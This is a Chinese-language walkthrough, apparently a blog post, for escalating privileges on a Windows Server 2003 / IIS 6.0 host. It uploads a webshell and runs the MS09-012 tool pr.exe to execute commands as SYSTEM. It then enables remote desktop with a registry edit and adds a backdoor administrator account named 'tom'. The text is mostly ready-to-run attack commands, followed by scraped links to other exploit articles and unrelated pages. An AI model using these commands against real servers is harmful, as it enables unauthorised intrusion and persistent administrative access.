操作系统: Microsoft Windows Server 2003

Web服务器: IIS V6.0

第一步,将大马文件上传至服务器根目录

第二步,访问大马文件,进入大马的控制界面

第三步,查看漏洞补丁信息

第四步,上传漏洞工具

将提权工具( 此处使用MS09-012漏洞工具 )上传到系统中,windows系统的回收站c:\windows\Temp目录默认具有上传和执行的权限

第五步,利用工具进行提权

payload

/c c:\windows\temp\pr.exe "whoami"

第六步,开启远程桌面端口

命令行查看是否开启3389( 远程桌面 )端口

/c c:\windows\temp\pr.exe "netstat -ano"

上传a.bat文件至c:\windows\temp目录下,内容为开启3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

执行a.bat文件,开启3389端口

/c c:\windows\temp\pr.exe "c:\windows\temp\a.bat"

查看3389是否开启成功

/c c:\windows\temp\pr.exe "netstat -ano"

第七步,添加管理员权限用户

添加普通用户tom

/c c:\windows\temp\pr.exe "net user tom 123456 /add"

将tom添加至administrators,拥有管理员权限

/c c:\windows\temp\pr.exe "net localgroup administrators tom /add"

第八步,物理机连接远程桌面

Windows2003系统漏洞提权复现相关推荐

  1. Linux脏牛漏洞提权复现

    操作系统: Linux ( CentOS 6.5) Web服务: PHP+Apache 环境搭建 第一步,配置yum源,安装PHP 进入yum目录 cd /etc/yum.repos.d/ 创建文件夹 ...

  2. 103.网络安全渗透测试—[权限提升篇1]—[Linux内核漏洞提权]

    我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一.LINUX 内核漏洞提权 1.漏洞背景: 2.漏洞利用: (1)实验环境 (2)靶机链接 (3)突破MIME ...

  3. 操作系统权限提升(三)之Windows系统内核溢出漏洞提权

    系列文章 操作系统权限提升(一)之操作系统权限介绍 操作系统权限提升(二)之常见提权的环境介绍 注:阅读本编文章前,请先阅读系列文章,以免造成看不懂的情况!!! Windows系统内核溢出漏洞提权介绍 ...

  4. 【内网—权限提升】——linux本地提权_脏牛漏洞提权

    文章目录 一.实验目的: 二.工具: 三.实验环境: 四.漏洞说明: 1. 原理: 2. 漏洞成因: 五.环境准备: 1. 安装Apache及php环境: 2. 安装gcc编译器(C语言编译器): 2 ...

  5. PR、巴西烤肉、iis6.0提权复现

    PR.巴西烤肉.iis6.0提权复现 大多数的时候,如果我们上传了一句话木马之后,想要进一步操作.比如,创建新用户,查看当前身份,这时会发现权限不够,当前的命令行只对网站当前目录下的文件具有操作权限, ...

  6. 系统内核溢出漏洞提权

    系统内核溢出漏洞提权是一种通用的提权的方法,攻击者通常可以使用该方法绕过系统的所有安全限制.攻击者利用该漏洞的关键是目标系统没有及时安装补丁. 存在局限性:如果目标系统的补丁更新工作较为迅速和完善,那 ...

  7. 2023年中职网络空间安全 Linux系统渗透提权

    B-3:Linux系统渗透提权 任务环境说明: 服务器场景:Server2204(关闭链接) 用户名:hacker        密码:123456. 1.使用渗透机对服务器学信息收集,并将服务器中S ...

  8. linux系统漏洞firefart,CVE-2016-5195脏牛Linux提权复现

    漏洞编号:CVE-2016-5195 影响范围: Linux kernel >= 2.6.22(2007年发行,到今年10月18日才修复) 漏洞影响:低权限用户利用该漏洞技术可以在全版本Linu ...

  9. 〖EXP〗Ladon打印机漏洞提权CVE-2021-1675复现

    基本情况 6月9日,微软发布6月安全更新补丁,修复了50个安全漏洞,其中包括一个Windows Print Spooler权限提升漏洞,漏洞CVE编号:CVE-2021-1675.未经身份验证的远程攻 ...

最新文章

  1. python flask 设置 header 响应体、响应头、状态码
  2. 如何识别一个指针式的时种的时间?
  3. Android or iOS 运行 meteor App 屏幕一片空白 White screen的解决方法
  4. js 单页面ajax缓存策略,浅谈ajax的缓存机制---IE浏览器方面
  5. 无服务器革命:好,坏和丑
  6. .Net Core Swagger:Actions require an explicit HttpMethod binding for Swagger 2.0
  7. legend函数_ggplot的图例(legend)管理
  8. java script 环境搭建_TypeScript环境搭建
  9. Learn RxJava
  10. Centos7 Zabbix3.2安装(yum)
  11. 一步步学习SPD2010--第十二章节--理解可用性和可接入性(5)--测试可用性
  12. Flutter之播放视频
  13. abb机器人工具坐标系设定方式_设定abb机器人工具坐标的方法
  14. Java通过JNI/JNA加载dll库文件调用C接口,出现“java.lang.UnsatisfiedLinkError:包名.类.方法(参数)”问题
  15. html5增加用户代码,HTML5 用户注册页面源代码
  16. 河北计算机应用对口升学,2019年河北省中等职业学校对口升学考试:计算机文化基础+计算机应用基础模拟试卷...
  17. wincc与第三方软件opc通讯_运用OPC实现WinCC与西门子SIMOTION的通讯
  18. 微生物组-扩增子16S分析和可视化(2023.2)
  19. 不同速度流体的剪切形成不同尺度的漩涡,看起来很像分形。
  20. 一、CPU寄存器说明

热门文章

  1. DIY可视化导出uni-app源码生成器
  2. 在linux下编译运行c语言程序
  3. Excel - 学习 - 笔记6: Excel 函数 - filter 函数
  4. java中的saturn_saturn java 热加载(一)
  5. 手机无法连接电脑的手机助手
  6. mmdetection2使用教程
  7. 服务器自检后显示scsi,SCSI RAID卡常见故障分析及BIOS升级指导
  8. Linux学习5之查找文件中的某个字符串并返回所在行号
  9. 事件营销说到底就是抓住热点事件做营销
  10. 使用fake_useragent报错:fake_useragent.errors.FakeUserAgentError: Maximum amount of retries reached